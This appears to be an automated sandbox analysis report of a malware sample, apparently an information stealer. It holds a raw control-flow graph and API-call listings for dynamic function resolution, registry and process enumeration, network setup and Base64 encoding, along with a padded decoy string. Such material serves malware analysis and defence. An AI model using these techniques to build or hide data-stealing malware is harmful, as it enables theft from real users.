3012289 59297->59298 59298->58771 59299->59297 59301 301a740 lstrcpy 59300->59301 59302 301230b 59301->59302 59302->58785 59304 301a740 lstrcpy 59303->59304 59311 3018229 59304->59311 59305 301823b EnumDisplayDevicesA 59306 3018263 59305->59306 59305->59311 59308 301a7a0 lstrcpy 59306->59308 59307 301a9b0 lstrcpy lstrlen lstrcpy lstrcat 59307->59311 59309 30182dc 59308->59309 59309->58802 59310 301a8a0 lstrcpy 59310->59311 59311->59305 59311->59307 59311->59310 59313 301a740 lstrcpy 59312->59313 59314 301835c RegOpenKeyExA 59313->59314 59315 30183d0 59314->59315 59316 30183ae 59314->59316 59318 3018613 RegCloseKey 59315->59318 59319 30183f8 RegEnumKeyExA 59315->59319 59317 301a7a0 lstrcpy 59316->59317 59329 30183bd 59317->59329 59320 301a7a0 lstrcpy 59318->59320 59321 301843f wsprintfA RegOpenKeyExA 59319->59321 59322 301860e 59319->59322 59320->59329 59323 30184c1 RegQueryValueExA 59321->59323 59324 3018485 RegCloseKey RegCloseKey 59321->59324 59322->59318 59325 3018601 RegCloseKey 59323->59325 59326 30184fa lstrlen 59323->59326 59327 301a7a0 lstrcpy 59324->59327 59325->59322 59326->59325 59328 3018510 59326->59328 59327->59329 59330 301a9b0 4 API calls 59328->59330 59329->58828 59331 3018527 59330->59331 59332 301a8a0 lstrcpy 59331->59332 59333 3018533 59332->59333 59334 301a9b0 4 API calls 59333->59334 59335 3018557 59334->59335 59336 301a8a0 lstrcpy 59335->59336 59337 3018563 59336->59337 59338 301856e RegQueryValueExA 59337->59338 59338->59325 59339 30185a3 59338->59339 59340 301a9b0 4 API calls 59339->59340 59341 30185ba 59340->59341 59342 301a8a0 lstrcpy 59341->59342 59343 30185c6 59342->59343 59344 301a9b0 4 API calls 59343->59344 59345 30185ea 59344->59345 59346 301a8a0 lstrcpy 59345->59346 59347 30185f6 59346->59347 59347->59325 59349 301a740 lstrcpy 59348->59349 59350 30186bc CreateToolhelp32Snapshot Process32First 59349->59350 59351 30186e8 Process32Next 59350->59351 59352 301875d CloseHandle 59350->59352 59351->59352 59356 30186fd 59351->59356 59353 301a7a0 lstrcpy 59352->59353 59355 3018776 59353->59355 59354 301a9b0 lstrcpy lstrlen lstrcpy lstrcat 59354->59356 59355->58860 59356->59351 59356->59354 59357 301a8a0 lstrcpy 59356->59357 59357->59356 59359 301a7a0 lstrcpy 59358->59359 59360 30151b5 59359->59360 59361 3001590 lstrcpy 59360->59361 59362 30151c6 59361->59362 59377 3005100 59362->59377 59364 30151cf 59364->58872 59368 3017720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 59365->59368 59367 30176b9 59367->59240 59367->59241 59369 3017780 RegCloseKey 59368->59369 59370 3017765 RegQueryValueExA 59368->59370 59371 3017793 59369->59371 59370->59369 59371->59367 59372->59255 59373->59291 59374->59291 59375->59289 59376->59285 59378 301a7a0 lstrcpy 59377->59378 59379 3005119 59378->59379 59380 30047b0 5 API calls 59379->59380 59381 3005125 59380->59381 59539 3018ea0 59381->59539 59383 3005184 59384 3005192 lstrlen 59383->59384 59385 30051a5 59384->59385 59386 3018ea0 4 API calls 59385->59386 59387 30051b6 59386->59387 59388 301a740 lstrcpy 59387->59388 59389 30051c9 59388->59389 59390 301a740 lstrcpy 59389->59390 59391 30051d6 59390->59391 59392 301a740 lstrcpy 59391->59392 59393 30051e3 59392->59393 59394 301a740 lstrcpy 59393->59394 59395 30051f0 59394->59395 59396 301a740 lstrcpy 59395->59396 59397 30051fd InternetOpenA StrCmpCA 59396->59397 59398 300522f 59397->59398 59399 30058c4 InternetCloseHandle 59398->59399 59400 3018b60 3 API calls 59398->59400 59406 30058d9 codecvt 59399->59406 59401 300524e 59400->59401 59402 301a920 3 API calls 59401->59402 59403 3005261 59402->59403 59404 301a8a0 lstrcpy 59403->59404 59405 300526a 59404->59405 59407 301a9b0 4 API calls 59405->59407 59409 301a7a0 lstrcpy 59406->59409 59408 30052ab 59407->59408 59410 301a920 3 API calls 59408->59410 59417 3005913 59409->59417 59417->59364 59540 3018ead CryptBinaryToStringA 59539->59540 59541 3018ea9 59539->59541 59540->59541 59542 3018ece GetProcessHeap RtlAllocateHeap 59540->59542 59541->59383 59542->59541 59543 3018ef4 codecvt 59542->59543 59544 3018f05 CryptBinaryToStringA 59543->59544 59544->59541 60901 3016af3 60903 3016ab1 60901->60903 60902 3016b0c 60904 3016920 11 API calls 60902->60904 60903->60902 60906 3016ac2 OpenEventA 60903->60906 60905 3016b11 60904->60905 60907 3015b10 907 API calls 60905->60907 60908 3016af5 CloseHandle Sleep 60906->60908 60909 3016ad9 60906->60909 60910 3016b16 CloseHandle ExitProcess 60907->60910 60908->60903 60911 3016ae1 CreateEventA 60909->60911 60911->60902 60912 6ccab8ae 60913 6ccab8ba ___scrt_is_nonwritable_in_current_image 60912->60913 60914 6ccab8e3 dllmain_raw 60913->60914 60915 6ccab8de 60913->60915 60924 6ccab8c9 60913->60924 60916 6ccab8fd dllmain_crt_dispatch 60914->60916 60914->60924 60925 6cc8bed0 DisableThreadLibraryCalls LoadLibraryExW 60915->60925 60916->60915 60916->60924 60918 6ccab91e 60919 6ccab94a 60918->60919 60926 6cc8bed0 DisableThreadLibraryCalls LoadLibraryExW 60918->60926 60920 6ccab953 dllmain_crt_dispatch 60919->60920 60919->60924 60922 6ccab966 dllmain_raw 60920->60922 60920->60924 60922->60924 60923 6ccab936 dllmain_crt_dispatch dllmain_raw 60923->60919 60925->60918 60926->60923 60927 6cc735a0 60928 6cc735c4 InitializeCriticalSectionAndSpinCount getenv 60927->60928 60929 6cc73846 __aulldiv 60927->60929 60930 6cc738fc strcmp 60928->60930 60943 6cc735f3 __aulldiv 60928->60943 60944 6ccab320 5 API calls ___raise_securityfailure 60929->60944 60933 6cc73912 strcmp 60930->60933 60930->60943 60932 6cc738f4 60933->60943 60934 6cc735f8 QueryPerformanceFrequency 60934->60943 60935 6cc73622 _strnicmp 60937 6cc73944 _strnicmp 60935->60937 60935->60943 60936 6cc7376a QueryPerformanceCounter EnterCriticalSection 60938 6cc737b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 60936->60938 60941 6cc7375c 60936->60941 60939 6cc7395d 60937->60939 60937->60943 60938->60941 60942 6cc737fc LeaveCriticalSection 60938->60942 60940 6cc73664 GetSystemTimeAdjustment 60940->60943 60941->60929 60941->60936 60941->60938 60941->60942 60942->60929 60942->60941 60943->60934 60943->60935 60943->60937 60943->60939 60943->60940 60943->60941 60944->60932 60945 6cc73060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 60950 6ccaab2a 60945->60950 60949 6cc730db 60954 6ccaae0c _crt_atexit _register_onexit_function 60950->60954 60952 6cc730cd 60953 6ccab320 5 API calls ___raise_securityfailure 60952->60953 60953->60949 60954->60952 60955 6cc8c930 GetSystemInfo VirtualAlloc 60956 6cc8c9a3 GetSystemInfo 60955->60956 60963 6cc8c973 60955->60963 60958 6cc8c9d0 60956->60958 60959 6cc8c9b6 60956->60959 60962 6cc8c9d8 VirtualAlloc 60958->60962 60958->60963 60959->60958 60961 6cc8c9bd 60959->60961 60960 6cc8c99b 60961->60963 60964 6cc8c9c1 VirtualFree 60961->60964 60965 6cc8c9ec 60962->60965 60966 6cc8c9f0 60962->60966 60971 6ccab320 5 API calls ___raise_securityfailure 60963->60971 60964->60963 60965->60963 60972 6ccacbe8 GetCurrentProcess TerminateProcess 60966->60972 60971->60960 60973 6ccab9c0 60974 6ccab9c9 60973->60974 60975 6ccab9ce dllmain_dispatch 60973->60975 60977 6ccabef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 60974->60977 60977->60975 60978 6ccab694 60979 6ccab6a0 ___scrt_is_nonwritable_in_current_image 60978->60979 61008 6ccaaf2a 60979->61008 60981 6ccab6a7 60982 6ccab6d1 60981->60982 60983 6ccab796 60981->60983 60986 6ccab6ac ___scrt_is_nonwritable_in_current_image 60981->60986 61012 6ccab064 60982->61012 61025 6ccab1f7 IsProcessorFeaturePresent 60983->61025 60987 6ccab6e0 __RTC_Initialize 60987->60986 61015 6ccabf89 InitializeSListHead 60987->61015 60989 6ccab6ee ___scrt_initialize_default_local_stdio_options 60993 6ccab6f3 _initterm_e 60989->60993 60990 6ccab79d ___scrt_is_nonwritable_in_current_image 60991 6ccab828 60990->60991 60992 6ccab7d2 60990->60992 61006 6ccab7b3 ___scrt_uninitialize_crt __RTC_Initialize 60990->61006 60996 6ccab1f7 ___scrt_fastfail 6 API calls 60991->60996 61029 6ccab09d _execute_onexit_table _cexit ___scrt_release_startup_lock 60992->61029 60993->60986 60994 6ccab708 60993->60994 61016 6ccab072 60994->61016 60999 6ccab82f 60996->60999 60998 6ccab7d7 61030 6ccabf95 __std_type_info_destroy_list 60998->61030 61003 6ccab83b 60999->61003 61004 6ccab86e dllmain_crt_process_detach 60999->61004 61000 6ccab70d 61000->60986 61002 6ccab711 _initterm 61000->61002 61002->60986 61005 6ccab860 dllmain_crt_process_attach 61003->61005 61007 6ccab840 61003->61007 61004->61007 61005->61007 61009 6ccaaf33 61008->61009 61031 6ccab341 IsProcessorFeaturePresent 61009->61031 61011 6ccaaf3f ___scrt_uninitialize_crt 61011->60981 61032 6ccaaf8b 61012->61032 61014 6ccab06b 61014->60987 61015->60989 61017 6ccab077 ___scrt_release_startup_lock 61016->61017 61018 6ccab07b 61017->61018 61019 6ccab082 61017->61019 61042 6ccab341 IsProcessorFeaturePresent 61018->61042 61022 6ccab087 _configure_narrow_argv 61019->61022 61021 6ccab080 61021->61000 61023 6ccab092 61022->61023 61024 6ccab095 _initialize_narrow_environment 61022->61024 61023->61000 61024->61021 61026 6ccab20c ___scrt_fastfail 61025->61026 61027 6ccab218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 61026->61027 61028 6ccab302 ___scrt_fastfail 61027->61028 61028->60990 61029->60998 61030->61006 61031->61011 61033 6ccaaf9a 61032->61033 61034 6ccaaf9e 61032->61034 61033->61014 61035 6ccab028 61034->61035 61038 6ccaafab ___scrt_release_startup_lock 61034->61038 61036 6ccab1f7 ___scrt_fastfail 6 API calls 61035->61036 61037 6ccab02f 61036->61037 61039 6ccaafb8 _initialize_onexit_table 61038->61039 61040 6ccaafd6 61038->61040 61039->61040 61041 6ccaafc7 _initialize_onexit_table 61039->61041 61040->61014 61041->61040 61042->61021

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EE40), ref: 03019C2D
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EB80), ref: 03019C45
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AC28), ref: 03019C5E
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AB50), ref: 03019C76
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AC70), ref: 03019C8E
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ADC0), ref: 03019CA7
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03550490), ref: 03019CBF
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ADD8), ref: 03019CD7
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AD78), ref: 03019CF0
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ACD0), ref: 03019D08
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AD90), ref: 03019D20
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EE00), ref: 03019D39
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EE20), ref: 03019D51
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ECC0), ref: 03019D69
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EBA0), ref: 03019D82
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ACB8), ref: 03019D9A
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AD60), ref: 03019DB2
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03550558), ref: 03019DCB
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EEA0), ref: 03019DE3
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ADF0), ref: 03019DFB
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE08), ref: 03019E14
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE38), ref: 03019E2C
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE50), ref: 03019E44
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EE60), ref: 03019E5D
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE20), ref: 03019E75
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE80), ref: 03019E8D
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AEE0), ref: 03019EA6
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE68), ref: 03019EBE
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AE98), ref: 03019ED6
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AEB0), ref: 03019EEF
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354AEC8), ref: 03019F07
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035551C8), ref: 03019F1F
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03555030), ref: 03019F38
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035493A0), ref: 03019F50
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03555060), ref: 03019F68
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035550C0), ref: 03019F81
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EF20), ref: 03019F99
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035551E0), ref: 03019FB1
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354ED60), ref: 03019FCA
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,035550A8), ref: 03019FE2
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,03555108), ref: 03019FFA
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EEC0), ref: 0301A013
                                                                                                                                                                • GetProcAddress.KERNEL32(75550000,0354EDC0), ref: 0301A02B
                                                                                                                                                                • LoadLibraryA.KERNEL32(035551F8,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A03D
                                                                                                                                                                • LoadLibraryA.KERNEL32(03555090,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A04E
                                                                                                                                                                • LoadLibraryA.KERNEL32(035552D0,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A060
                                                                                                                                                                • LoadLibraryA.KERNEL32(03555180,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A072
                                                                                                                                                                • LoadLibraryA.KERNEL32(03555048,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A083
                                                                                                                                                                • LoadLibraryA.KERNEL32(03554FE8,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A095
                                                                                                                                                                • LoadLibraryA.KERNEL32(03555000,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A0A7
                                                                                                                                                                • LoadLibraryA.KERNEL32(03555078,?,03015CA3,?,00000034,00000064,03016600,?,0000002C,00000064,030165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0301A0B8
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,0354EEE0), ref: 0301A0DA
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,035550D8), ref: 0301A0F2
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,03554F40), ref: 0301A10A
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,035550F0), ref: 0301A123
                                                                                                                                                                • GetProcAddress.KERNEL32(75750000,0354EF00), ref: 0301A13B
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,035504E0), ref: 0301A160
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,0354EBC0), ref: 0301A179
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,03550418), ref: 0301A191
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,03555288), ref: 0301A1A9
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,03555018), ref: 0301A1C2
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,0354EC00), ref: 0301A1DA
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,0354EC20), ref: 0301A1F2
                                                                                                                                                                • GetProcAddress.KERNEL32(74010000,03555120), ref: 0301A20B
                                                                                                                                                                • GetProcAddress.KERNEL32(757E0000,0354EC40), ref: 0301A22C
                                                                                                                                                                • GetProcAddress.KERNEL32(757E0000,0354EC60), ref: 0301A244
                                                                                                                                                                • GetProcAddress.KERNEL32(757E0000,03555138), ref: 0301A25D
                                                                                                                                                                • GetProcAddress.KERNEL32(757E0000,03555210), ref: 0301A275
                                                                                                                                                                • GetProcAddress.KERNEL32(757E0000,0354EC80), ref: 0301A28D
                                                                                                                                                                • GetProcAddress.KERNEL32(758D0000,03550440), ref: 0301A2B3
                                                                                                                                                                • GetProcAddress.KERNEL32(758D0000,03550580), ref: 0301A2CB
                                                                                                                                                                • GetProcAddress.KERNEL32(758D0000,035552B8), ref: 0301A2E3
                                                                                                                                                                • GetProcAddress.KERNEL32(758D0000,03555670), ref: 0301A2FC
                                                                                                                                                                • GetProcAddress.KERNEL32(758D0000,03555550), ref: 0301A314
                                                                                                                                                                • GetProcAddress.KERNEL32(758D0000,035505A8), ref: 0301A32C
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03555270), ref: 0301A352
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,035556D0), ref: 0301A36A
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03554F30), ref: 0301A382
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03555150), ref: 0301A39B
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03555168), ref: 0301A3B3
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03555410), ref: 0301A3CB
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,035553F0), ref: 0301A3E4
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03555198), ref: 0301A3FC
                                                                                                                                                                • GetProcAddress.KERNEL32(76BE0000,03555240), ref: 0301A414
                                                                                                                                                                • GetProcAddress.KERNEL32(75670000,035554F0), ref: 0301A436
                                                                                                                                                                • GetProcAddress.KERNEL32(75670000,035551B0), ref: 0301A44E
                                                                                                                                                                • GetProcAddress.KERNEL32(75670000,03555228), ref: 0301A466
                                                                                                                                                                • GetProcAddress.KERNEL32(75670000,03555258), ref: 0301A47F
                                                                                                                                                                • GetProcAddress.KERNEL32(75670000,035552A0), ref: 0301A497
                                                                                                                                                                • GetProcAddress.KERNEL32(759D0000,03555430), ref: 0301A4B8
                                                                                                                                                                • GetProcAddress.KERNEL32(759D0000,035556B0), ref: 0301A4D1
                                                                                                                                                                • GetProcAddress.KERNEL32(76D80000,03555710), ref: 0301A4F2
                                                                                                                                                                • GetProcAddress.KERNEL32(76D80000,03555300), ref: 0301A50A
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,035554B0), ref: 0301A530
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,035555B0), ref: 0301A548
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,035557D0), ref: 0301A560
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,03555378), ref: 0301A579
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,03555630), ref: 0301A591
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,035555D0), ref: 0301A5A9
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,03555730), ref: 0301A5C2
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,03555450), ref: 0301A5DA
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,InternetSetOptionA), ref: 0301A5F1
                                                                                                                                                                • GetProcAddress.KERNEL32(6F5C0000,HttpQueryInfoA), ref: 0301A607
                                                                                                                                                                • GetProcAddress.KERNEL32(75480000,03555348), ref: 0301A629
                                                                                                                                                                • GetProcAddress.KERNEL32(75480000,03554EF0), ref: 0301A641
                                                                                                                                                                • GetProcAddress.KERNEL32(75480000,03555330), ref: 0301A659
                                                                                                                                                                • GetProcAddress.KERNEL32(75480000,03555318), ref: 0301A672
                                                                                                                                                                • GetProcAddress.KERNEL32(753B0000,035556F0), ref: 0301A693
                                                                                                                                                                • GetProcAddress.KERNEL32(6FE80000,035552E8), ref: 0301A6B4
                                                                                                                                                                • GetProcAddress.KERNEL32(6FE80000,03555470), ref: 0301A6CD
                                                                                                                                                                • GetProcAddress.KERNEL32(6FE80000,03555360), ref: 0301A6E5
                                                                                                                                                                • GetProcAddress.KERNEL32(6FE80000,03555390), ref: 0301A6FD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                                • API String ID: 2238633743-1775429166
                                                                                                                                                                • Opcode ID: 35b3f4558264589b7a6332e0c426950a34baf5fc7b6dd9b03ac8420b76eb69c7
                                                                                                                                                                • Instruction ID: 1fa9f6cd11fe135e133a047c1b2faa795dcac146f6700dc2c6bd4c35e516f75f
                                                                                                                                                                • Opcode Fuzzy Hash: 35b3f4558264589b7a6332e0c426950a34baf5fc7b6dd9b03ac8420b76eb69c7
                                                                                                                                                                • Instruction Fuzzy Hash: 3F62F9BD6C1240AFD764FFA8FA8C96A3BF9F78C601714C51AA60AC724CD7399441DB60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 030045CC
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 030045D7
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 030045E2
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 030045ED
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 030045F8
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,030169FB), ref: 03004607
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,0000000F), ref: 0300460E
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 0300461C
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 03004627
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 03004632
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 0300463D
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 03004648
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 0300465C
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 03004667
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 03004672
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 0300467D
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,030169FB), ref: 03004688
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030046B1
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030046BC
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030046C7
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030046D2
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030046DD
                                                                                                                                                                • strlen.MSVCRT ref: 030046F0
                                                                                                                                                                • lstrlen.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03004718
